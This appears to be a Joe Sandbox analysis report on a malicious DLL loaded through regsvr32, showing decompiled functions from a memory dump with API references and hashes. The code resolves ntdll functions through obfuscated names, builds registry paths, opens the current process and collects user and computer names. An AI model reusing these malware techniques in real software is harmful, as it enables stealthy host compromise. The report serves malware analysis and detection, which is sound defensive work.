				_t60 = E02AF540A();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E02AF540A();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E02AF2C2A(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E02AF2C2A(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E02AF5C2F(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x2af918c;
						}
						_t70 = E02AF224E(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E02AF7A71(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x2afa348; // 0x248d5a8
								_t102 =  *0x2afa138; // 0x2af7db3
								_t28 = _t105 + 0x2afbb08; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E02AF5C2F(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x2af9190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E02AF7A71(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E02AF789E(_v24);
								} else {
									_t92 =  *0x2afa348; // 0x248d5a8
									_t44 = _t92 + 0x2afbc80; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E02AF789E(_v8);
						}
						E02AF789E(_v12);
					}
					E02AF789E(_v16);
				}
				return _v28;
			}

0x02af41cb
0x02af41d3
0x02af41d6
0x02af41e3
0x02af41e6
0x02af41ed
0x02af41f4
0x02af41f7
0x02af4204
0x02af4207
0x02af420a
0x02af420f
0x02af4214
0x02af421c
0x02af4221
0x02af4226
0x02af422c
0x02af4230
0x02af4239
0x02af423d
0x02af423f
0x02af423f
0x02af4247
0x02af424c
0x02af4251
0x02af4257
0x02af425e
0x02af426f
0x02af4276
0x02af4288
0x02af428d
0x02af4292
0x02af429b
0x02af42a4
0x02af42ad
0x02af42c3
0x02af42c8
0x02af42cc
0x02af42d0
0x02af42d5
0x02af42da
0x02af42dc
0x02af42dc
0x02af42e6
0x02af42ef
0x02af42f6
0x02af4312
0x02af4316
0x02af434f
0x02af4318
0x02af431b
0x02af4323
0x02af4334
0x02af433c
0x02af4344
0x02af4348
0x02af4348
0x02af4316
0x02af4357
0x02af4357
0x02af435f
0x02af435f
0x02af4367
0x02af4367
0x02af4373

APIs

GetTickCount.KERNEL32 ref: 02AF41DD
lstrlen.KERNEL32(00000000,00000005), ref: 02AF425E
lstrlen.KERNEL32(?), ref: 02AF426F
lstrlen.KERNEL32(00000000), ref: 02AF4276
lstrlenW.KERNEL32(80000002), ref: 02AF427D
lstrlen.KERNEL32(?,00000004), ref: 02AF42E6
lstrlen.KERNEL32(?), ref: 02AF42EF
lstrlen.KERNEL32(?), ref: 02AF42F6
lstrlenW.KERNEL32(?), ref: 02AF42FD

Part of subcall function 02AF789E: RtlFreeHeap.NTDLL(00000000,00000000,02AF4E3E,00000000,?,00000000,00000000), ref: 02AF78AA

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: fb383dc1b3cf16e0f1390e255940ffc72eb95d1925596867c938bb25ce7e1a03
Instruction ID: 3068cee98781963b5d15f5685585664f4968aed6e54b6c511e3cf9ba6b7cf0bc
Opcode Fuzzy Hash: fb383dc1b3cf16e0f1390e255940ffc72eb95d1925596867c938bb25ce7e1a03
Instruction Fuzzy Hash: F1516C32D4021AABCF52AFE4DD44ADE7BB2AF44314F154064FA04A7210DF39CA22DF94

Uniqueness

Uniqueness Score: -1.00%

Function 02AF2AA6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF2AA6(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02AF7A71(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2afa348; // 0x248d5a8
					_t1 = _t23 + 0x2afb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2afa348; // 0x248d5a8
					_t2 = _t26 + 0x2afb761; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02AF789E(_t54);
					} else {
						_t30 =  *0x2afa348; // 0x248d5a8
						_t5 = _t30 + 0x2afb74e; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2afa348; // 0x248d5a8
							_t7 = _t33 + 0x2afb771; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2afa348; // 0x248d5a8
								_t9 = _t36 + 0x2afb4ca; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2afa348; // 0x248d5a8
									_t11 = _t39 + 0x2afb786; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02AF2156(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x02af2ab5
0x02af2ab9
0x02af2b7b
0x02af2abf
0x02af2abf
0x02af2ac4
0x02af2ad7
0x02af2ad9
0x02af2ade
0x02af2ae6
0x02af2aed
0x02af2aef
0x02af2af4
0x02af2b73
0x02af2b74
0x02af2af6
0x02af2af6
0x02af2afb
0x02af2b03
0x02af2b05
0x02af2b0a
0x00000000
0x02af2b0c
0x02af2b0c
0x02af2b11
0x02af2b19
0x02af2b1b
0x02af2b20
0x00000000
0x02af2b22
0x02af2b22
0x02af2b27
0x02af2b2f
0x02af2b31
0x02af2b36
0x00000000
0x02af2b38
0x02af2b38
0x02af2b3d
0x02af2b45
0x02af2b47
0x02af2b4c
0x00000000
0x02af2b4e
0x02af2b54
0x02af2b59
0x02af2b60
0x02af2b65
0x02af2b6a
0x00000000
0x02af2b6c
0x02af2b6f
0x02af2b6f
0x02af2b6a
0x02af2b4c
0x02af2b36
0x02af2b20
0x02af2b0a
0x02af2af4
0x02af2b89

APIs

Part of subcall function 02AF7A71: RtlAllocateHeap.NTDLL(00000000,00000000,02AF4DB1), ref: 02AF7A7D

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02AF3C0C,?,?,?,?,00000000,00000000), ref: 02AF2ACB
GetProcAddress.KERNEL32(00000000,7243775A), ref: 02AF2AED
GetProcAddress.KERNEL32(00000000,614D775A), ref: 02AF2B03
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02AF2B19
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02AF2B2F
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02AF2B45

Part of subcall function 02AF2156: memset.NTDLL ref: 02AF21D5

Strings

Nqt, xrefs: 02AF2AD1

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID: Nqt
API String ID: 1886625739-806837294
Opcode ID: c4f2ce9432145b9d4991c4df64a0747c848afa4f9c39b981a48dab444403e0a4
Instruction ID: ac239246cf3f039d6163af1248c1fdf685f0b520323a919da5e89bea222e4551
Opcode Fuzzy Hash: c4f2ce9432145b9d4991c4df64a0747c848afa4f9c39b981a48dab444403e0a4
Instruction Fuzzy Hash: 15212AB194070A9FD7A0DFA9C884F9AB7FCEB047847014965FE49C7221DF78EA058B60

Uniqueness

Uniqueness Score: -1.00%

Function 02AF2D54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF2D54(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2afa30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2afa2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2afa2f8 = _t6;
					 *0x2afa304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2afa2f4 = _t7;
					if(_t7 == 0) {
						 *0x2afa2f4 =  *0x2afa2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x02af2d5c
0x02af2d62
0x02af2d69
0x00000000
0x02af2dc3
0x02af2d6b
0x02af2d73
0x02af2d80
0x02af2d80
0x02af2dc0
0x00000000
0x02af2dc0
0x02af2d82
0x02af2d82
0x02af2d87
0x02af2d99
0x02af2d9e
0x02af2da4
0x02af2daa
0x02af2db1
0x02af2db3
0x02af2db3
0x00000000
0x02af2dba
0x02af2d7c
0x00000000
0x00000000
0x02af2d7e
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02AF72F1,?), ref: 02AF2D5C
GetVersion.KERNEL32 ref: 02AF2D6B
GetCurrentProcessId.KERNEL32 ref: 02AF2D87
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02AF2DA4
GetLastError.KERNEL32 ref: 02AF2DC3

Strings

@MqtNqt, xrefs: 02AF2DC3

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID: @MqtNqt
API String ID: 2270775618-2883916605
Opcode ID: 2baee761e2e48e85ed0ed84fc8237f174030fdbf0c3f06d329519b34724e8445
Instruction ID: de1619752d906b9ff546d85199eafa708024bb14a802ddecd18e75511fbd0cac
Opcode Fuzzy Hash: 2baee761e2e48e85ed0ed84fc8237f174030fdbf0c3f06d329519b34724e8445
Instruction Fuzzy Hash: 13F06975BC03039BE7E44FE4A859BA63B61A740701F10491AFB5AC61D5DF7CC0A2CE15

Uniqueness

Uniqueness Score: -1.00%

Function 02AF5E6F Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 02AF5EC9
SysAllocString.OLEAUT32(0070006F), ref: 02AF5EDD
SysAllocString.OLEAUT32(00000000), ref: 02AF5EEF
SysFreeString.OLEAUT32(00000000), ref: 02AF5F57
SysFreeString.OLEAUT32(00000000), ref: 02AF5F66
SysFreeString.OLEAUT32(00000000), ref: 02AF5F71

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: bb9d2c9ef750c1bee4ae0e16aad3d9a122bc1cdd06fe2e9a5b304da23a2570d9
Instruction ID: 1293caa677610fed7ecc59da8f7981bccbb01b7be09e0c53a7bec999078fbc25
Opcode Fuzzy Hash: bb9d2c9ef750c1bee4ae0e16aad3d9a122bc1cdd06fe2e9a5b304da23a2570d9
Instruction Fuzzy Hash: 80418C32D00609ABDB41EFF8D844A9FB7BAEF49300F554466FA10EB110DB75DA05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02AF2331 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02AF2331(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x2afa3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E02AF3D2E( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E02AF2087(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E02AF789E(_a8);
						goto L29;
					}
					_t64 =  *0x2afa318; // 0x4f89dc0
					_t16 = _t64 + 0xc; // 0x4f89ee2
					_t65 = E02AF3D2E(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d02af90
						if(E02AF6BEB(_t97,  *_t33, _t91, _a8,  *0x2afa3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x2afa348; // 0x248d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x2afba3e; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x2afba39; // 0x55434b48
								_t69 = _t34;
							}
							if(E02AF41C5(_t69,  *0x2afa3d4,  *0x2afa3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x2afa348; // 0x248d5a8
									_t44 = _t71 + 0x2afb842; // 0x74666f53
									_t73 = E02AF3D2E(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d02af90
										E02AF187F( *_t47, _t91, _a8,  *0x2afa3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d02af90
										E02AF187F( *_t49, _t91, _t99,  *0x2afa3d0, _a16);
										E02AF789E(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d02af90
									E02AF187F( *_t40, _t91, _a8,  *0x2afa3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d02af90
									E02AF187F( *_t43, _t91, _a8,  *0x2afa3d0, _a16);
								}
								if( *_t101 != 0) {
									E02AF789E(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d02af90
					_t81 = E02AF78B3( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d02af90
							E02AF6BEB(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E02AF789E(_t100);
						_t98 = _a16;
					}
					E02AF789E(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E02AF7A86(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x2afa3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x02af2331
0x02af233a
0x02af2341
0x02af2346
0x02af23b3
0x02af23b9
0x02af23be
0x02af23c5
0x02af23ca
0x02af23cf
0x02af253a
0x02af2541
0x02af2541
0x02af2546
0x02af2548
0x02af2548
0x02af2551
0x02af2551
0x02af23d5
0x02af23e1
0x02af2530
0x02af2533
0x00000000
0x02af2533
0x02af23e7
0x02af23ec
0x02af23ef
0x02af23f4
0x02af23f9
0x02af2442
0x02af2442
0x02af2455
0x02af245f
0x02af2465
0x02af246c
0x02af2476
0x02af2476
0x02af246e
0x02af246e
0x02af246e
0x02af246e
0x02af2498
0x02af24a0
0x02af24ce
0x02af24d3
0x02af24da
0x02af24df
0x02af24e3
0x02af2515
0x02af24e5
0x02af24f2
0x02af24f5
0x02af2505
0x02af2508
0x02af250e
0x02af250e
0x02af24a2
0x02af24af
0x02af24b2
0x02af24c4
0x02af24c7
0x02af24c7
0x02af251f
0x02af252b
0x02af2521
0x02af2524
0x02af2524
0x02af251f
0x02af2498
0x00000000
0x02af245f
0x02af2408
0x02af240b
0x02af2412
0x02af2418
0x02af241b
0x02af241d
0x02af2429
0x02af242c
0x02af242c
0x02af2432
0x02af2437
0x02af2437
0x02af243d
0x00000000
0x02af243d
0x02af234b
0x00000000
0x02af2372
0x02af2372
0x02af237e
0x02af2391
0x02af2397
0x02af239f
0x00000000
0x02af239f

APIs

StrChrA.SHLWAPI(02AF68B1,0000005F,00000000,00000000,00000104), ref: 02AF2364
lstrcpy.KERNEL32(?,?), ref: 02AF2391

Part of subcall function 02AF3D2E: lstrlen.KERNEL32(?,00000000,04F89DC0,00000000,02AF695F,04F89FE3,69B25F44,?,?,?,?,69B25F44,00000005,02AFA00C,4D283A53,?), ref: 02AF3D35
Part of subcall function 02AF3D2E: mbstowcs.NTDLL ref: 02AF3D5E
Part of subcall function 02AF3D2E: memset.NTDLL ref: 02AF3D70

Part of subcall function 02AF187F: lstrlenW.KERNEL32(?,?,?,02AF24FA,3D02AF90,80000002,02AF68B1,02AF1629,74666F53,4D4C4B48,02AF1629,?,3D02AF90,80000002,02AF68B1,?), ref: 02AF18A4

Part of subcall function 02AF789E: RtlFreeHeap.NTDLL(00000000,00000000,02AF4E3E,00000000,?,00000000,00000000), ref: 02AF78AA

lstrcpy.KERNEL32(?,00000000), ref: 02AF23B3

Strings

(, xrefs: 02AF2414
\, xrefs: 02AF2397

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: bae6e758d957be357f81773205c70a58745deee6b2f7cd6e92dd29e4b8dc1dab
Instruction ID: c2a428a8da376d4fb994d8cf7abcc926a501dd4d1cb728d90bc6e48f9f70f7d3
Opcode Fuzzy Hash: bae6e758d957be357f81773205c70a58745deee6b2f7cd6e92dd29e4b8dc1dab
Instruction Fuzzy Hash: 0D51473654020AEBDFA19FE0DD90FAA7BBAAB08344F008954FB1596120DF3DD925DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02AF731D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E02AF731D() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2afa3cc; // 0x4f89600
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2afa3cc; // 0x4f89600
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2afa3cc; // 0x4f89600
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2afb827) {
					HeapFree( *0x2afa2d8, 0, _t10);
					_t7 =  *0x2afa3cc; // 0x4f89600
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x02af731d
0x02af7326
0x02af7336
0x02af7336
0x02af733b
0x02af7340
0x00000000
0x00000000
0x02af7330
0x02af7330
0x02af7342
0x02af7347
0x02af734b
0x02af735e
0x02af7364
0x02af7364
0x02af736d
0x02af736f
0x02af7373
0x02af7379

APIs

RtlEnterCriticalSection.NTDLL(04F895C0), ref: 02AF7326
Sleep.KERNEL32(0000000A), ref: 02AF7330
HeapFree.KERNEL32(00000000), ref: 02AF735E
RtlLeaveCriticalSection.NTDLL(04F895C0), ref: 02AF7373

Strings

Uqt, xrefs: 02AF735E

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uqt
API String ID: 58946197-2320327147
Opcode ID: 204f8c74a96447fc12bd1039975f178d9e58ffb21cb178ee84af44f83ebf09e9
Instruction ID: 45a1689446c75e395f7e18666c808ba2d7702343beca9b0f4e81a7587bf241df
Opcode Fuzzy Hash: 204f8c74a96447fc12bd1039975f178d9e58ffb21cb178ee84af44f83ebf09e9
Instruction Fuzzy Hash: 12F0D078A80202AFE7948BD4DC99F5677F4AB44300B045958FB06C7751CF3CEC62DA11

Uniqueness

Uniqueness Score: -1.00%

Function 02AF3ACA Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF3ACA() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x775ec742
						_v12 = _v12 + _t11;
						_t64 = E02AF7A71(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02AF789E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2af3764
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x02af3ad8
0x02af3adb
0x02af3ade
0x02af3ae4
0x02af3ae9
0x02af3aef
0x02af3af7
0x02af3afa
0x02af3b00
0x02af3b05
0x02af3b0e
0x02af3b12
0x02af3b1f
0x02af3b23
0x02af3b25
0x02af3b29
0x02af3b2c
0x02af3b3c
0x02af3b8f
0x02af3b90
0x02af3b3e
0x02af3b43
0x02af3b44
0x02af3b49
0x02af3b4c
0x02af3b5f
0x00000000
0x02af3b61
0x02af3b64
0x02af3b69
0x02af3b77
0x02af3b7a
0x02af3b80
0x02af3b85
0x00000000
0x02af3b87
0x02af3b87
0x02af3b8a
0x02af3b8a
0x02af3b85
0x02af3b5f
0x02af3b95
0x02af3b96
0x02af3b05
0x02af3b9c

APIs

GetUserNameW.ADVAPI32(00000000,02AF3762), ref: 02AF3ADE
GetComputerNameW.KERNEL32(00000000,02AF3762), ref: 02AF3AFA

Part of subcall function 02AF7A71: RtlAllocateHeap.NTDLL(00000000,00000000,02AF4DB1), ref: 02AF7A7D

GetUserNameW.ADVAPI32(00000000,02AF3762), ref: 02AF3B34
GetComputerNameW.KERNEL32(02AF3762,775EC740), ref: 02AF3B57
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02AF3762,00000000,02AF3764,00000000,00000000,?,775EC740,02AF3762), ref: 02AF3B7A

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: c1408e572c0c29abbf28ed57bf1ebd80928886ec2660cef3c9389fbeda055b74
Instruction ID: 4fc4da6de903116cd069a08bd42d23077fb43732c15ce97fa4b61b3730ca9750
Opcode Fuzzy Hash: c1408e572c0c29abbf28ed57bf1ebd80928886ec2660cef3c9389fbeda055b74
Instruction Fuzzy Hash: 3821F876900248FFCB11EFE4D989DEEBBB8EF44344B1044AAE602E7240DB349B45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02AF64A2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

